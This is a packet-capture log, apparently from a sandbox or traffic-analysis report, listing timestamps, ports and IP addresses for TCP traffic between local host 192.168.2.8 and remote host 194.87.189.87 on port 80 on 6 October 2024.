                                                                                                                                    Oct 6, 2024 21:28:16.571034908 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571036100 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571063995 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571064949 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571074009 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571082115 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571118116 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571170092 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571178913 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571192980 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571201086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571225882 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571233034 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571254969 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571275949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571295023 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571319103 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571326971 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571331024 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571372986 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571412086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571449995 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571461916 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571470976 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571497917 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571511030 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571513891 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571544886 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571553946 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571563005 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571604013 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571690083 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571698904 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571723938 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571726084 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571734905 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571757078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571779013 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571808100 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571815968 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571844101 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571867943 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.571971893 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.571980953 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572021961 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572073936 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572108030 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572137117 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572145939 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572165966 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572185040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572206974 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572235107 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572249889 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572280884 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572308064 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572335958 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572376966 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572384119 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572406054 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572419882 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572421074 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.572443962 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.572460890 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.576843977 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.576864004 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.576864958 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.576898098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.576905966 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.576921940 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.576930046 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.576941967 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.576966047 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577028990 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577038050 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577047110 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577054977 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577081919 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577101946 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577126026 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577135086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577162981 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577186108 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577189922 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577199936 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577231884 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577265978 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577285051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577305079 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577342033 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577413082 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577449083 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577472925 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577481985 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577497005 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577512980 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577537060 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577557087 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577565908 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577601910 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577644110 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577652931 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577677965 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577706099 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577709913 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577716112 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577740908 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577763081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577785969 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577802896 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577821970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577841997 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577919960 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577929974 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577944994 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577955008 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.577961922 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.577984095 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578002930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578043938 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578052998 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578068972 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578078032 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578100920 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578113079 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578145027 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578207016 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578216076 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578226089 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578233957 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578248024 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578277111 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578289032 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578330040 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578330040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578340054 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578363895 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578382015 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578421116 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578458071 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578526974 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578536034 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578578949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578651905 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578660965 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578669071 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578676939 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578689098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578726053 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578775883 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578783989 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578815937 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578819036 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578824997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578871012 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578901052 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578910112 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578938007 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578938961 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578948021 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.578960896 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.578983068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579016924 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579025984 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579062939 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579063892 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579072952 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579114914 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579165936 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579174995 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579189062 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579219103 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579237938 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579312086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579322100 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579351902 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579359055 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579369068 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579370022 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579379082 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579394102 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579411983 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579483032 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579492092 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579521894 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579524040 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579540968 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579562902 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579579115 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579585075 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579596043 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579621077 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579639912 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579672098 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579682112 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579698086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579706907 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579711914 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579725027 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579746962 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.579782963 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579793930 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.579814911 CEST8049748194.87.189.87192.168.2.8
Oct 6, 2024 21:28:16.579818010 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.579843998 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.579860926 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.579891920 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.579927921 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.579938889 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.579948902 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.579972982 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.579991102 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580080032 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580100060 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580121040 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580142021 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580225945 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580261946 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580285072 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580332041 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580332041 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580342054 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580368996 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580389023 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580451012 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580460072 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580487013 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580506086 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580514908 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580524921 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580554008 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580558062 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580563068 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580590010 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580619097 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580648899 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580684900 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580697060 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580714941 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580733061 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580743074 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580750942 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580765009 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580777884 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580782890 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580810070 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580831051 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580897093 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580913067 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580920935 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580933094 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580956936 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.580960035 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.580991030 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581007004 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581034899 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581043959 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581065893 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581068993 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581103086 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581129074 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581170082 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581192970 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581208944 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581217051 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581228971 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581255913 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581289053 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581317902 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581321955 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581326962 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581370115 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581389904 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581434011 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581573009 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581600904 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581609011 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581645012 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581686974 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581696987 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581722975 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581726074 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581742048 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581742048 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581775904 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581798077 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581831932 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581840992 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581850052 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581887007 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581919909 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581947088 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.581954002 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581983089 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.581994057 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582010984 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582026958 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582052946 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582056046 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582078934 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582088947 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582117081 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582124949 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582139969 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582149029 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582158089 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582184076 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582199097 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582214117 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582238913 CEST  49748  80     192.168.2.8    194.87.189.87
